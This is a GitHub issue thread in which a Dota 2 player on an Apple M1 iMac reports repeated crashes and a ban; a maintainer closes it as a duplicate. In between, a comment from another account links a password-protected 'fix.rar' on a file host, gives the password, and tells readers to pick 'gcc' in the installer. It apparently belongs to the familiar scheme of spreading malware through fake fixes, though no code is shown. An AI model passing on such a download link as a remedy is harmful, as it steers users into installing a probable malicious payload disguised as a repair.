### ISSUE TITLE
crashed every time and i banned 

### ISSUE THREAD

**Issue by diriftking** [ValveSoftware/Dota-2#2800]
#### Your system information
Computer Information:
Manufacturer: Apple
Model: iMac21,1
Form Factor: Desktop
No Touch Input Detected
Processor Information:
CPU Vendor: VirtualApple
CPU Brand: Apple M1
CPU Family: 0x6
CPU Model: 0xc
CPU Stepping: 0x0
CPU Type: 0x0
Speed: 3555728978 MHz
8 logical processors
8 physical processors
Hyper-threading: Unsupported
FCMOV: Unsupported
SSE2: Supported
SSE3: Supported
SSSE3: Supported
SSE4a: Unsupported
SSE41: Supported
SSE42: Supported
AES: Supported
AVX: Unsupported
AVX2: Unsupported
AVX512F: Unsupported
AVX512PF: Unsupported
AVX512ER: Unsupported
AVX512CD: Unsupported
AVX512VNNI: Unsupported
SHA: Unsupported
CMPXCHG16B: Supported
LAHF/SAHF: Supported
PrefetchW: Unsupported
Operating System Version:
MacOS 14.6.1 (64 bit)
Video Card:
Driver: Apple M1
Driver Version: 282.14
OpenGL Version: 4.1
Desktop Color Depth: 32 bits per pixel
Monitor Refresh Rate: 60 Hz
VendorID: 0x106b
DeviceID: 0x0
Revision Not Detected
Number of Monitors: 1
Number of Logical Video Cards: 1
Primary Display Resolution: 2240 x 1260
Desktop Resolution: 2240 x 1260
Primary Display Size: 20.51" x 11.54" (23.50" diag), 52.1cm x 29.3cm (59.7cm diag)
Primary VRAM: 16384 MB
Memory:
RAM: 16384 Mb
VR Hardware:
VR Headset: None detected
Miscellaneous:
UI Language: English
Media Type: DVD
Total Hard Disk Space Available: 948584 MB
Largest Free Hard Disk Block: 515424 MB
Storage:
Number of SSDs: 0
Number of HDDs: 0
Number of removable drives: 0
* System information from steam (`Steam` -> `Help` -> `System Information`) in a [gist](https://gist.github.com/):

* Have you checked for system updates?: Yes
* Are you using the latest stable video driver available for your system? Yes
* Have you verified the game files?: Yes

#### Please describe your issue in as much detail as possible:
Describe what you _expected_ should happen and what _did_ happen. Please link any large pastes as a [Github Gist](https://gist.github.com/).
<img width="254" alt="Screenshot 2024-08-23 at 18 22 06" src="https://github.com/user-attachments/assets/e679af35-e523-45f9-ba02-7ec824bcff71">
crashed every time and i banned 
<img width="425" alt="Screenshot 2024-08-26 at 18 44 29" src="https://github.com/user-attachments/assets/95b35cba-f969-4893-81ee-c97124670906">

#### Steps for reproducing this issue:

1. 
2. 
3.

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by kisak-valve** [comment]
Hello @diriftking, this issue is already being tracked at #2784. Closing as a duplicate.
